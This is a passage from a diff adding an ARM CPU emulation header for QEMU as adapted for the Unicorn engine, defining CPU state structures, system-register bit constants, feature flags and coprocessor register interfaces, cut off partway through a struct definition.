c15_i_max; /* Maximum D-cache dirty line index. */ + uint32_t c15_i_min; /* Minimum D-cache dirty line index. */ + uint32_t c15_threadid; /* TI debugger thread-ID. */ + uint32_t c15_config_base_address; /* SCU base address. */ + uint32_t c15_diagnostic; /* diagnostic register */ + uint32_t c15_power_diagnostic; + uint32_t c15_power_control; /* power control */ + uint64_t dbgbvr[16]; /* breakpoint value registers */ + uint64_t dbgbcr[16]; /* breakpoint control registers */ + uint64_t dbgwvr[16]; /* watchpoint value registers */ + uint64_t dbgwcr[16]; /* watchpoint control registers */ + uint64_t mdscr_el1; + /* If the counter is enabled, this stores the last time the counter + * was reset. Otherwise it stores the counter value + */ + uint64_t c15_ccnt; + uint64_t pmccfiltr_el0; /* Performance Monitor Filter Register */ + } cp15; + + struct { + uint32_t other_sp; + uint32_t vecbase; + uint32_t basepri; + uint32_t control; + int current_sp; + int exception; + int pending_exception; + } v7m; + + /* Information associated with an exception about to be taken: + * code which raises an exception must set cs->exception_index and + * the relevant parts of this structure; the cpu_do_interrupt function + * will then set the guest-visible registers as part of the exception + * entry process. + */ + struct { + uint32_t syndrome; /* AArch64 format syndrome register */ + uint32_t fsr; /* AArch32 format fault status register info */ + uint64_t vaddress; /* virtual addr associated with exception, if any */ + /* If we implement EL2 we will also need to store information + * about the intermediate physical address for stage 2 faults. + */ + } exception; + + /* Thumb-2 EE state. */ + uint32_t teecr; + uint32_t teehbr; + + /* VFP coprocessor state. */ + struct { + /* VFP/Neon register state. Note that the mapping between S, D and Q + * views of the register bank differs between AArch64 and AArch32: + * In AArch32: + * Qn = regs[2n+1]:regs[2n] + * Dn = regs[n] + * Sn = regs[n/2] bits 31..0 for even n, and bits 63..32 for odd n + * (and regs[32] to regs[63] are inaccessible) + * In AArch64: + * Qn = regs[2n+1]:regs[2n] + * Dn = regs[2n] + * Sn = regs[2n] bits 31..0 + * This corresponds to the architecturally defined mapping between + * the two execution states, and means we do not need to explicitly + * map these registers when changing states. + */ + float64 regs[64]; + + uint32_t xregs[16]; + /* We store these fpcsr fields separately for convenience. */ + int vec_len; + int vec_stride; + + /* scratch space when Tn are not sufficient. */ + uint32_t scratch[8]; + + /* fp_status is the "normal" fp status. standard_fp_status retains + * values corresponding to the ARM "Standard FPSCR Value", ie + * default-NaN, flush-to-zero, round-to-nearest and is used by + * any operations (generally Neon) which the architecture defines + * as controlled by the standard FPSCR value rather than the FPSCR. + * + * To avoid having to transfer exception bits around, we simply + * say that the FPSCR cumulative exception flags are the logical + * OR of the flags in the two fp statuses. This relies on the + * only thing which needs to read the exception flags being + * an explicit FPSCR read. + */ + float_status fp_status; + float_status standard_fp_status; + } vfp; + uint64_t exclusive_addr; + uint64_t exclusive_val; + uint64_t exclusive_high; +#if defined(CONFIG_USER_ONLY) + uint64_t exclusive_test; + uint32_t exclusive_info; +#endif + + /* iwMMXt coprocessor state. */ + struct { + uint64_t regs[16]; + uint64_t val; + + uint32_t cregs[16]; + } iwmmxt; + + /* For mixed endian mode. */ + bool bswap_code; + +#if defined(CONFIG_USER_ONLY) + /* For usermode syscall translation. */ + int eabi; +#endif + + struct CPUBreakpoint *cpu_breakpoint[16]; + struct CPUWatchpoint *cpu_watchpoint[16]; + + CPU_COMMON + + /* These fields after the common ones so they are preserved on reset. */ + + /* Internal CPU feature flags. */ + uint64_t features; + + void *nvic; + const struct arm_boot_info *boot_info; + + // Unicorn engine + struct uc_struct *uc; +} CPUARMState; + +#include "cpu-qom.h" + +ARMCPU *cpu_arm_init(struct uc_struct *uc, const char *cpu_model); +int cpu_arm_exec(struct uc_struct *uc, CPUARMState *s); +uint32_t do_arm_semihosting(CPUARMState *env); + +static inline bool is_a64(CPUARMState *env) +{ + return env->aarch64; +} + +/* you can call this signal handler from your SIGBUS and SIGSEGV + signal handlers to inform the virtual CPU of exceptions. non zero + is returned if the signal was handled by the virtual CPU. */ +int cpu_arm_signal_handler(int host_signum, void *pinfo, + void *puc); +int arm_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); + +/** + * pmccntr_sync + * @env: CPUARMState + * + * Synchronises the counter in the PMCCNTR. This must always be called twice, + * once before any action that might affect the timer and again afterwards. + * The function is used to swap the state of the register if required. + * This only happens when not in user mode (!CONFIG_USER_ONLY) + */ +void pmccntr_sync(CPUARMState *env); + +/* SCTLR bit meanings. Several bits have been reused in newer + * versions of the architecture; in that case we define constants + * for both old and new bit meanings. Code which tests against those + * bits should probably check or otherwise arrange that the CPU + * is the architectural version it expects. + */ +#define SCTLR_M (1U << 0) +#define SCTLR_A (1U << 1) +#define SCTLR_C (1U << 2) +#define SCTLR_W (1U << 3) /* up to v6; RAO in v7 */ +#define SCTLR_SA (1U << 3) +#define SCTLR_P (1U << 4) /* up to v5; RAO in v6 and v7 */ +#define SCTLR_SA0 (1U << 4) /* v8 onward, AArch64 only */ +#define SCTLR_D (1U << 5) /* up to v5; RAO in v6 */ +#define SCTLR_CP15BEN (1U << 5) /* v7 onward */ +#define SCTLR_L (1U << 6) /* up to v5; RAO in v6 and v7; RAZ in v8 */ +#define SCTLR_B (1U << 7) /* up to v6; RAZ in v7 */ +#define SCTLR_ITD (1U << 7) /* v8 onward */ +#define SCTLR_S (1U << 8) /* up to v6; RAZ in v7 */ +#define SCTLR_SED (1U << 8) /* v8 onward */ +#define SCTLR_R (1U << 9) /* up to v6; RAZ in v7 */ +#define SCTLR_UMA (1U << 9) /* v8 onward, AArch64 only */ +#define SCTLR_F (1U << 10) /* up to v6 */ +#define SCTLR_SW (1U << 10) /* v7 onward */ +#define SCTLR_Z (1U << 11) +#define SCTLR_I (1U << 12) +#define SCTLR_V (1U << 13) +#define SCTLR_RR (1U << 14) /* up to v7 */ +#define SCTLR_DZE (1U << 14) /* v8 onward, AArch64 only */ +#define SCTLR_L4 (1U << 15) /* up to v6; RAZ in v7 */ +#define SCTLR_UCT (1U << 15) /* v8 onward, AArch64 only */ +#define SCTLR_DT (1U << 16) /* up to ??, RAO in v6 and v7 */ +#define SCTLR_nTWI (1U << 16) /* v8 onward */ +#define SCTLR_HA (1U << 17) +#define SCTLR_IT (1U << 18) /* up to ??, RAO in v6 and v7 */ +#define SCTLR_nTWE (1U << 18) /* v8 onward */ +#define SCTLR_WXN (1U << 19) +#define SCTLR_ST (1U << 20) /* up to ??, RAZ in v6 */ +#define SCTLR_UWXN (1U << 20) /* v7 onward */ +#define SCTLR_FI (1U << 21) +#define SCTLR_U (1U << 22) +#define SCTLR_XP (1U << 23) /* up to v6; v7 onward RAO */ +#define SCTLR_VE (1U << 24) /* up to v7 */ +#define SCTLR_E0E (1U << 24) /* v8 onward, AArch64 only */ +#define SCTLR_EE (1U << 25) +#define SCTLR_L2 (1U << 26) /* up to v6, RAZ in v7 */ +#define SCTLR_UCI (1U << 26) /* v8 onward, AArch64 only */ +#define SCTLR_NMFI (1U << 27) +#define SCTLR_TRE (1U << 28) +#define SCTLR_AFE (1U << 29) +#define SCTLR_TE (1U << 30) + +#define CPSR_M (0x1fU) +#define CPSR_T (1U << 5) +#define CPSR_F (1U << 6) +#define CPSR_I (1U << 7) +#define CPSR_A (1U << 8) +#define CPSR_E (1U << 9) +#define CPSR_IT_2_7 (0xfc00U) +#define CPSR_GE (0xfU << 16) +#define CPSR_IL (1U << 20) +/* Note that the RESERVED bits include bit 21, which is PSTATE_SS in + * an AArch64 SPSR but RES0 in AArch32 SPSR and CPSR. In QEMU we use + * env->uncached_cpsr bit 21 to store PSTATE.SS when executing in AArch32, + * where it is live state but not accessible to the AArch32 code. + */ +#define CPSR_RESERVED (0x7U << 21) +#define CPSR_J (1U << 24) +#define CPSR_IT_0_1 (3U << 25) +#define CPSR_Q (1U << 27) +#define CPSR_V (1U << 28) +#define CPSR_C (1U << 29) +#define CPSR_Z (1U << 30) +#define CPSR_N (1U << 31) +#define CPSR_NZCV (CPSR_N | CPSR_Z | CPSR_C | CPSR_V) +#define CPSR_AIF (CPSR_A | CPSR_I | CPSR_F) + +#define CPSR_IT (CPSR_IT_0_1 | CPSR_IT_2_7) +#define CACHED_CPSR_BITS (CPSR_T | CPSR_AIF | CPSR_GE | CPSR_IT | CPSR_Q \ + | CPSR_NZCV) +/* Bits writable in user mode. */ +#define CPSR_USER (CPSR_NZCV | CPSR_Q | CPSR_GE) +/* Execution state bits. MRS read as zero, MSR writes ignored. */ +#define CPSR_EXEC (CPSR_T | CPSR_IT | CPSR_J | CPSR_IL) +/* Mask of bits which may be set by exception return copying them from SPSR */ +#define CPSR_ERET_MASK (~CPSR_RESERVED) + +#define TTBCR_N (7U << 0) /* TTBCR.EAE==0 */ +#define TTBCR_T0SZ (7U << 0) /* TTBCR.EAE==1 */ +#define TTBCR_PD0 (1U << 4) +#define TTBCR_PD1 (1U << 5) +#define TTBCR_EPD0 (1U << 7) +#define TTBCR_IRGN0 (3U << 8) +#define TTBCR_ORGN0 (3U << 10) +#define TTBCR_SH0 (3U << 12) +#define TTBCR_T1SZ (3U << 16) +#define TTBCR_A1 (1U << 22) +#define TTBCR_EPD1 (1U << 23) +#define TTBCR_IRGN1 (3U << 24) +#define TTBCR_ORGN1 (3U << 26) +#define TTBCR_SH1 (1U << 28) +#define TTBCR_EAE (1U << 31) + +/* Bit definitions for ARMv8 SPSR (PSTATE) format. + * Only these are valid when in AArch64 mode; in + * AArch32 mode SPSRs are basically CPSR-format. + */ +#define PSTATE_SP (1U) +#define PSTATE_M (0xFU) +#define PSTATE_nRW (1U << 4) +#define PSTATE_F (1U << 6) +#define PSTATE_I (1U << 7) +#define PSTATE_A (1U << 8) +#define PSTATE_D (1U << 9) +#define PSTATE_IL (1U << 20) +#define PSTATE_SS (1U << 21) +#define PSTATE_V (1U << 28) +#define PSTATE_C (1U << 29) +#define PSTATE_Z (1U << 30) +#define PSTATE_N (1U << 31) +#define PSTATE_NZCV (PSTATE_N | PSTATE_Z | PSTATE_C | PSTATE_V) +#define PSTATE_DAIF (PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F) +#define CACHED_PSTATE_BITS (PSTATE_NZCV | PSTATE_DAIF) +/* Mode values for AArch64 */ +#define PSTATE_MODE_EL3h 13 +#define PSTATE_MODE_EL3t 12 +#define PSTATE_MODE_EL2h 9 +#define PSTATE_MODE_EL2t 8 +#define PSTATE_MODE_EL1h 5 +#define PSTATE_MODE_EL1t 4 +#define PSTATE_MODE_EL0t 0 + +/* Map EL and handler into a PSTATE_MODE. */ +static inline unsigned int aarch64_pstate_mode(unsigned int el, bool handler) +{ + return (el << 2) | handler; +} + +/* Return the current PSTATE value. For the moment we don't support 32<->64 bit + * interprocessing, so we don't attempt to sync with the cpsr state used by + * the 32 bit decoder. + */ +static inline uint32_t pstate_read(CPUARMState *env) +{ + int ZF; + + ZF = (env->ZF == 0); + return (env->NF & 0x80000000) | (ZF << 30) + | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) + | env->pstate | env->daif; +} + +static inline void pstate_write(CPUARMState *env, uint32_t val) +{ + env->ZF = (~val) & PSTATE_Z; + env->NF = val; + env->CF = (val >> 29) & 1; + env->VF = (val << 3) & 0x80000000; + env->daif = val & PSTATE_DAIF; + env->pstate = val & ~CACHED_PSTATE_BITS; +} + +/* Return the current CPSR value. */ +uint32_t cpsr_read(CPUARMState *env); +/* Set the CPSR. Note that some bits of mask must be all-set or all-clear. */ +void cpsr_write(CPUARMState *env, uint32_t val, uint32_t mask); + +/* Return the current xPSR value. */ +static inline uint32_t xpsr_read(CPUARMState *env) +{ + int ZF; + ZF = (env->ZF == 0); + return (env->NF & 0x80000000) | (ZF << 30) + | (env->CF << 29) | ((env->VF & 0x80000000) >> 3) | (env->QF << 27) + | (env->thumb << 24) | ((env->condexec_bits & 3) << 25) + | ((env->condexec_bits & 0xfc) << 8) + | env->v7m.exception; +} + +/* Set the xPSR. Note that some bits of mask must be all-set or all-clear. */ +static inline void xpsr_write(CPUARMState *env, uint32_t val, uint32_t mask) +{ + if (mask & CPSR_NZCV) { + env->ZF = (~val) & CPSR_Z; + env->NF = val; + env->CF = (val >> 29) & 1; + env->VF = (val << 3) & 0x80000000; + } + if (mask & CPSR_Q) + env->QF = ((val & CPSR_Q) != 0); + if (mask & (1 << 24)) + env->thumb = ((val & (1 << 24)) != 0); + if (mask & CPSR_IT_0_1) { + env->condexec_bits &= ~3; + env->condexec_bits |= (val >> 25) & 3; + } + if (mask & CPSR_IT_2_7) { + env->condexec_bits &= 3; + env->condexec_bits |= (val >> 8) & 0xfc; + } + if (mask & 0x1ff) { + env->v7m.exception = val & 0x1ff; + } +} + +#define HCR_VM (1ULL << 0) +#define HCR_SWIO (1ULL << 1) +#define HCR_PTW (1ULL << 2) +#define HCR_FMO (1ULL << 3) +#define HCR_IMO (1ULL << 4) +#define HCR_AMO (1ULL << 5) +#define HCR_VF (1ULL << 6) +#define HCR_VI (1ULL << 7) +#define HCR_VSE (1ULL << 8) +#define HCR_FB (1ULL << 9) +#define HCR_BSU_MASK (3ULL << 10) +#define HCR_DC (1ULL << 12) +#define HCR_TWI (1ULL << 13) +#define HCR_TWE (1ULL << 14) +#define HCR_TID0 (1ULL << 15) +#define HCR_TID1 (1ULL << 16) +#define HCR_TID2 (1ULL << 17) +#define HCR_TID3 (1ULL << 18) +#define HCR_TSC (1ULL << 19) +#define HCR_TIDCP (1ULL << 20) +#define HCR_TACR (1ULL << 21) +#define HCR_TSW (1ULL << 22) +#define HCR_TPC (1ULL << 23) +#define HCR_TPU (1ULL << 24) +#define HCR_TTLB (1ULL << 25) +#define HCR_TVM (1ULL << 26) +#define HCR_TGE (1ULL << 27) +#define HCR_TDZ (1ULL << 28) +#define HCR_HCD (1ULL << 29) +#define HCR_TRVM (1ULL << 30) +#define HCR_RW (1ULL << 31) +#define HCR_CD (1ULL << 32) +#define HCR_ID (1ULL << 33) +#define HCR_MASK ((1ULL << 34) - 1) + +#define SCR_NS (1U << 0) +#define SCR_IRQ (1U << 1) +#define SCR_FIQ (1U << 2) +#define SCR_EA (1U << 3) +#define SCR_FW (1U << 4) +#define SCR_AW (1U << 5) +#define SCR_NET (1U << 6) +#define SCR_SMD (1U << 7) +#define SCR_HCE (1U << 8) +#define SCR_SIF (1U << 9) +#define SCR_RW (1U << 10) +#define SCR_ST (1U << 11) +#define SCR_TWI (1U << 12) +#define SCR_TWE (1U << 13) +#define SCR_AARCH32_MASK (0x3fff & ~(SCR_RW | SCR_ST)) +#define SCR_AARCH64_MASK (0x3fff & ~SCR_NET) + +/* Return the current FPSCR value. */ +uint32_t vfp_get_fpscr(CPUARMState *env); +void vfp_set_fpscr(CPUARMState *env, uint32_t val); + +/* For A64 the FPSCR is split into two logically distinct registers, + * FPCR and FPSR. However since they still use non-overlapping bits + * we store the underlying state in fpscr and just mask on read/write. + */ +#define FPSR_MASK 0xf800009f +#define FPCR_MASK 0x07f79f00 +static inline uint32_t vfp_get_fpsr(CPUARMState *env) +{ + return vfp_get_fpscr(env) & FPSR_MASK; +} + +static inline void vfp_set_fpsr(CPUARMState *env, uint32_t val) +{ + uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPSR_MASK) | (val & FPSR_MASK); + vfp_set_fpscr(env, new_fpscr); +} + +static inline uint32_t vfp_get_fpcr(CPUARMState *env) +{ + return vfp_get_fpscr(env) & FPCR_MASK; +} + +static inline void vfp_set_fpcr(CPUARMState *env, uint32_t val) +{ + uint32_t new_fpscr = (vfp_get_fpscr(env) & ~FPCR_MASK) | (val & FPCR_MASK); + vfp_set_fpscr(env, new_fpscr); +} + +enum arm_cpu_mode { + ARM_CPU_MODE_USR = 0x10, + ARM_CPU_MODE_FIQ = 0x11, + ARM_CPU_MODE_IRQ = 0x12, + ARM_CPU_MODE_SVC = 0x13, + ARM_CPU_MODE_MON = 0x16, + ARM_CPU_MODE_ABT = 0x17, + ARM_CPU_MODE_HYP = 0x1a, + ARM_CPU_MODE_UND = 0x1b, + ARM_CPU_MODE_SYS = 0x1f +}; + +/* VFP system registers. */ +#define ARM_VFP_FPSID 0 +#define ARM_VFP_FPSCR 1 +#define ARM_VFP_MVFR2 5 +#define ARM_VFP_MVFR1 6 +#define ARM_VFP_MVFR0 7 +#define ARM_VFP_FPEXC 8 +#define ARM_VFP_FPINST 9 +#define ARM_VFP_FPINST2 10 + +/* iwMMXt coprocessor control registers. */ +#define ARM_IWMMXT_wCID 0 +#define ARM_IWMMXT_wCon 1 +#define ARM_IWMMXT_wCSSF 2 +#define ARM_IWMMXT_wCASF 3 +#define ARM_IWMMXT_wCGR0 8 +#define ARM_IWMMXT_wCGR1 9 +#define ARM_IWMMXT_wCGR2 10 +#define ARM_IWMMXT_wCGR3 11 + +/* If adding a feature bit which corresponds to a Linux ELF + * HWCAP bit, remember to update the feature-bit-to-hwcap + * mapping in linux-user/elfload.c:get_elf_hwcap(). + */ +enum arm_features { + ARM_FEATURE_VFP, + ARM_FEATURE_AUXCR, /* ARM1026 Auxiliary control register. */ + ARM_FEATURE_XSCALE, /* Intel XScale extensions. */ + ARM_FEATURE_IWMMXT, /* Intel iwMMXt extension. */ + ARM_FEATURE_V6, + ARM_FEATURE_V6K, + ARM_FEATURE_V7, + ARM_FEATURE_THUMB2, + ARM_FEATURE_MPU, /* Only has Memory Protection Unit, not full MMU. */ + ARM_FEATURE_VFP3, + ARM_FEATURE_VFP_FP16, + ARM_FEATURE_NEON, + ARM_FEATURE_THUMB_DIV, /* divide supported in Thumb encoding */ + ARM_FEATURE_M, /* Microcontroller profile. */ + ARM_FEATURE_OMAPCP, /* OMAP specific CP15 ops handling. */ + ARM_FEATURE_THUMB2EE, + ARM_FEATURE_V7MP, /* v7 Multiprocessing Extensions */ + ARM_FEATURE_V4T, + ARM_FEATURE_V5, + ARM_FEATURE_STRONGARM, + ARM_FEATURE_VAPA, /* cp15 VA to PA lookups */ + ARM_FEATURE_ARM_DIV, /* divide supported in ARM encoding */ + ARM_FEATURE_VFP4, /* VFPv4 (implies that NEON is v2) */ + ARM_FEATURE_GENERIC_TIMER, + ARM_FEATURE_MVFR, /* Media and VFP Feature Registers 0 and 1 */ + ARM_FEATURE_DUMMY_C15_REGS, /* RAZ/WI all of cp15 crn=15 */ + ARM_FEATURE_CACHE_TEST_CLEAN, /* 926/1026 style test-and-clean ops */ + ARM_FEATURE_CACHE_DIRTY_REG, /* 1136/1176 cache dirty status register */ + ARM_FEATURE_CACHE_BLOCK_OPS, /* v6 optional cache block operations */ + ARM_FEATURE_MPIDR, /* has cp15 MPIDR */ + ARM_FEATURE_PXN, /* has Privileged Execute Never bit */ + ARM_FEATURE_LPAE, /* has Large Physical Address Extension */ + ARM_FEATURE_V8, + ARM_FEATURE_AARCH64, /* supports 64 bit mode */ + ARM_FEATURE_V8_AES, /* implements AES part of v8 Crypto Extensions */ + ARM_FEATURE_CBAR, /* has cp15 CBAR */ + ARM_FEATURE_CRC, /* ARMv8 CRC instructions */ + ARM_FEATURE_CBAR_RO, /* has cp15 CBAR and it is read-only */ + ARM_FEATURE_EL2, /* has EL2 Virtualization support */ + ARM_FEATURE_EL3, /* has EL3 Secure monitor support */ + ARM_FEATURE_V8_SHA1, /* implements SHA1 part of v8 Crypto Extensions */ + ARM_FEATURE_V8_SHA256, /* implements SHA256 part of v8 Crypto Extensions */ + ARM_FEATURE_V8_PMULL, /* implements PMULL part of v8 Crypto Extensions */ +}; + +static inline int arm_feature(CPUARMState *env, int feature) +{ + return (env->features & (1ULL << feature)) != 0; +} + +#if !defined(CONFIG_USER_ONLY) +/* Return true if exception levels below EL3 are in secure state, + * or would be following an exception return to that level. + * Unlike arm_is_secure() (which is always a question about the + * _current_ state of the CPU) this doesn't care about the current + * EL or mode. + */ +static inline bool arm_is_secure_below_el3(CPUARMState *env) +{ + if (arm_feature(env, ARM_FEATURE_EL3)) { + return !(env->cp15.scr_el3 & SCR_NS); + } else { + /* If EL2 is not supported then the secure state is implementation + * defined, in which case QEMU defaults to non-secure. + */ + return false; + } +} + +/* Return true if the processor is in secure state */ +static inline bool arm_is_secure(CPUARMState *env) +{ + if (arm_feature(env, ARM_FEATURE_EL3)) { + if (is_a64(env) && extract32(env->pstate, 2, 2) == 3) { + /* CPU currently in AArch64 state and EL3 */ + return true; + } else if (!is_a64(env) && + (env->uncached_cpsr & CPSR_M) == ARM_CPU_MODE_MON) { + /* CPU currently in AArch32 state and monitor mode */ + return true; + } + } + return arm_is_secure_below_el3(env); +} + +#else +static inline bool arm_is_secure_below_el3(CPUARMState *env) +{ + return false; +} + +static inline bool arm_is_secure(CPUARMState *env) +{ + return false; +} +#endif + +/* Return true if the specified exception level is running in AArch64 state. */ +static inline bool arm_el_is_aa64(CPUARMState *env, int el) +{ + /* We don't currently support EL2, and this isn't valid for EL0 + * (if we're in EL0, is_a64() is what you want, and if we're not in EL0 + * then the state of EL0 isn't well defined.) + */ + assert(el == 1 || el == 3); + + /* AArch64-capable CPUs always run with EL1 in AArch64 mode. This + * is a QEMU-imposed simplification which we may wish to change later. + * If we in future support EL2 and/or EL3, then the state of lower + * exception levels is controlled by the HCR.RW and SCR.RW bits. + */ + return arm_feature(env, ARM_FEATURE_AARCH64); +} + +void arm_cpu_list(FILE *f, fprintf_function cpu_fprintf); +unsigned int arm_excp_target_el(CPUState *cs, unsigned int excp_idx); + +/* Interface between CPU and Interrupt controller. */ +void armv7m_nvic_set_pending(void *opaque, int irq); +int armv7m_nvic_acknowledge_irq(void *opaque); +void armv7m_nvic_complete_irq(void *opaque, int irq); + +/* Interface for defining coprocessor registers. + * Registers are defined in tables of arm_cp_reginfo structs + * which are passed to define_arm_cp_regs(). + */ + +/* When looking up a coprocessor register we look for it + * via an integer which encodes all of: + * coprocessor number + * Crn, Crm, opc1, opc2 fields + * 32 or 64 bit register (ie is it accessed via MRC/MCR + * or via MRRC/MCRR?) + * We allow 4 bits for opc1 because MRRC/MCRR have a 4 bit field. + * (In this case crn and opc2 should be zero.) + * For AArch64, there is no 32/64 bit size distinction; + * instead all registers have a 2 bit op0, 3 bit op1 and op2, + * and 4 bit CRn and CRm. The encoding patterns are chosen + * to be easy to convert to and from the KVM encodings, and also + * so that the hashtable can contain both AArch32 and AArch64 + * registers (to allow for interprocessing where we might run + * 32 bit code on a 64 bit core). + */ +/* This bit is private to our hashtable cpreg; in KVM register + * IDs the AArch64/32 distinction is the KVM_REG_ARM/ARM64 + * in the upper bits of the 64 bit ID. + */ +#define CP_REG_AA64_SHIFT 28 +#define CP_REG_AA64_MASK (1 << CP_REG_AA64_SHIFT) + +#define ENCODE_CP_REG(cp, is64, crn, crm, opc1, opc2) \ + (((cp) << 16) | ((is64) << 15) | ((crn) << 11) | \ + ((crm) << 7) | ((opc1) << 3) | (opc2)) + +#define ENCODE_AA64_CP_REG(cp, crn, crm, op0, op1, op2) \ + (CP_REG_AA64_MASK | \ + ((cp) << CP_REG_ARM_COPROC_SHIFT) | \ + ((op0) << CP_REG_ARM64_SYSREG_OP0_SHIFT) | \ + ((op1) << CP_REG_ARM64_SYSREG_OP1_SHIFT) | \ + ((crn) << CP_REG_ARM64_SYSREG_CRN_SHIFT) | \ + ((crm) << CP_REG_ARM64_SYSREG_CRM_SHIFT) | \ + ((op2) << CP_REG_ARM64_SYSREG_OP2_SHIFT)) + +/* Convert a full 64 bit KVM register ID to the truncated 32 bit + * version used as a key for the coprocessor register hashtable + */ +static inline uint32_t kvm_to_cpreg_id(uint64_t kvmid) +{ + uint32_t cpregid = kvmid; + if ((kvmid & CP_REG_ARCH_MASK) == CP_REG_ARM64) { + cpregid |= CP_REG_AA64_MASK; + } else if ((kvmid & CP_REG_SIZE_MASK) == CP_REG_SIZE_U64) { + cpregid |= (1 << 15); + } + return cpregid; +} + +/* Convert a truncated 32 bit hashtable key into the full + * 64 bit KVM register ID. + */ +static inline uint64_t cpreg_to_kvm_id(uint32_t cpregid) +{ + uint64_t kvmid; + + if (cpregid & CP_REG_AA64_MASK) { + kvmid = cpregid & ~CP_REG_AA64_MASK; + kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM64; + } else { + kvmid = cpregid & ~(1 << 15); + if (cpregid & (1 << 15)) { + kvmid |= CP_REG_SIZE_U64 | CP_REG_ARM; + } else { + kvmid |= CP_REG_SIZE_U32 | CP_REG_ARM; + } + } + return kvmid; +} + +/* ARMCPRegInfo type field bits. If the SPECIAL bit is set this is a + * special-behaviour cp reg and bits [15..8] indicate what behaviour + * it has. Otherwise it is a simple cp reg, where CONST indicates that + * TCG can assume the value to be constant (ie load at translate time) + * and 64BIT indicates a 64 bit wide coprocessor register. SUPPRESS_TB_END + * indicates that the TB should not be ended after a write to this register + * (the default is that the TB ends after cp writes). OVERRIDE permits + * a register definition to override a previous definition for the + * same (cp, is64, crn, crm, opc1, opc2) tuple: either the new or the + * old must have the OVERRIDE bit set. + * NO_MIGRATE indicates that this register should be ignored for migration; + * (eg because any state is accessed via some other coprocessor register). + * IO indicates that this register does I/O and therefore its accesses + * need to be surrounded by gen_io_start()/gen_io_end(). In particular, + * registers which implement clocks or timers require this. + */ +#define ARM_CP_SPECIAL 1 +#define ARM_CP_CONST 2 +#define ARM_CP_64BIT 4 +#define ARM_CP_SUPPRESS_TB_END 8 +#define ARM_CP_OVERRIDE 16 +#define ARM_CP_NO_MIGRATE 32 +#define ARM_CP_IO 64 +#define ARM_CP_NOP (ARM_CP_SPECIAL | (1 << 8)) +#define ARM_CP_WFI (ARM_CP_SPECIAL | (2 << 8)) +#define ARM_CP_NZCV (ARM_CP_SPECIAL | (3 << 8)) +#define ARM_CP_CURRENTEL (ARM_CP_SPECIAL | (4 << 8)) +#define ARM_CP_DC_ZVA (ARM_CP_SPECIAL | (5 << 8)) +#define ARM_LAST_SPECIAL ARM_CP_DC_ZVA +/* Used only as a terminator for ARMCPRegInfo lists */ +#define ARM_CP_SENTINEL 0xffff +/* Mask of only the flag bits in a type field */ +#define ARM_CP_FLAG_MASK 0x7f + +/* Valid values for ARMCPRegInfo state field, indicating which of + * the AArch32 and AArch64 execution states this register is visible in. + * If the reginfo doesn't explicitly specify then it is AArch32 only. + * If the reginfo is declared to be visible in both states then a second + * reginfo is synthesised for the AArch32 view of the AArch64 register, + * such that the AArch32 view is the lower 32 bits of the AArch64 one. + * Note that we rely on the values of these enums as we iterate through + * the various states in some places. + */ +enum { + ARM_CP_STATE_AA32 = 0, + ARM_CP_STATE_AA64 = 1, + ARM_CP_STATE_BOTH = 2, +}; + +/* Return true if cptype is a valid type field. This is used to try to + * catch errors where the sentinel has been accidentally left off the end + * of a list of registers. + */ +static inline bool cptype_valid(int cptype) +{ + return ((cptype & ~ARM_CP_FLAG_MASK) == 0) + || ((cptype & ARM_CP_SPECIAL) && + ((cptype & ~ARM_CP_FLAG_MASK) <= ARM_LAST_SPECIAL)); +} + +/* Access rights: + * We define bits for Read and Write access for what rev C of the v7-AR ARM ARM + * defines as PL0 (user), PL1 (fiq/irq/svc/abt/und/sys, ie privileged), and + * PL2 (hyp). The other level which has Read and Write bits is Secure PL1 + * (ie any of the privileged modes in Secure state, or Monitor mode). + * If a register is accessible in one privilege level it's always accessible + * in higher privilege levels too. Since "Secure PL1" also follows this rule + * (ie anything visible in PL2 is visible in S-PL1, some things are only + * visible in S-PL1) but "Secure PL1" is a bit of a mouthful, we bend the + * terminology a little and call this PL3. + * In AArch64 things are somewhat simpler as the PLx bits line up exactly + * with the ELx exception levels. + * + * If access permissions for a register are more complex than can be + * described with these bits, then use a laxer set of restrictions, and + * do the more restrictive/complex check inside a helper function. + */ +#define PL3_R 0x80 +#define PL3_W 0x40 +#define PL2_R (0x20 | PL3_R) +#define PL2_W (0x10 | PL3_W) +#define PL1_R (0x08 | PL2_R) +#define PL1_W (0x04 | PL2_W) +#define PL0_R (0x02 | PL1_R) +#define PL0_W (0x01 | PL1_W) + +#define PL3_RW (PL3_R | PL3_W) +#define PL2_RW (PL2_R | PL2_W) +#define PL1_RW (PL1_R | PL1_W) +#define PL0_RW (PL0_R | PL0_W) + +/* Return the current Exception Level (as per ARMv8; note that this differs + * from the ARMv7 Privilege Level). + */ +static inline int arm_current_el(CPUARMState *env) +{ + if (is_a64(env)) { + return extract32(env->pstate, 2, 2); + } + + switch (env->uncached_cpsr & 0x1f) { + case ARM_CPU_MODE_USR: + return 0; + case ARM_CPU_MODE_HYP: + return 2; + case ARM_CPU_MODE_MON: + return 3; + default: + if (arm_is_secure(env) && !arm_el_is_aa64(env, 3)) { + /* If EL3 is 32-bit then all secure privileged modes run in + * EL3 + */ + return 3; + } + + return 1; + } +} + +typedef struct ARMCPRegInfo ARMCPRegInfo; + +typedef enum CPAccessResult { + /* Access is permitted */ + CP_ACCESS_OK = 0, + /* Access fails due to a configurable trap or enable which would + * result in a categorized exception syndrome giving information about + * the failing instruction (ie syndrome category 0x3, 0x4, 0x5, 0x6, + * 0xc or 0x18). + */ + CP_ACCESS_TRAP = 1, + /* Access fails and results in an exception syndrome 0x0 ("uncategorized"). + * Note that this is not a catch-all case -- the set of cases which may + * result in this failure is specifically defined by the architecture. + */ + CP_ACCESS_TRAP_UNCATEGORIZED = 2, +} CPAccessResult; + +/* Access functions for coprocessor registers. These cannot fail and + * may not raise exceptions. + */ +typedef uint64_t CPReadFn(CPUARMState *env, const ARMCPRegInfo *opaque); +typedef void CPWriteFn(CPUARMState *env, const ARMCPRegInfo *opaque, + uint64_t value); +/* Access permission check functions for coprocessor registers. */ +typedef CPAccessResult CPAccessFn(CPUARMState *env, const ARMCPRegInfo *opaque); +/* Hook function for register reset */ +typedef void CPResetFn(CPUARMState *env, const ARMCPRegInfo *opaque); + +#define CP_ANY 0xff + +/* Definition of an ARM coprocessor register */ +struct ARMCPRegInfo { + /* Name of register (useful mainly for debugging, need not be unique) */ + const char *name; + 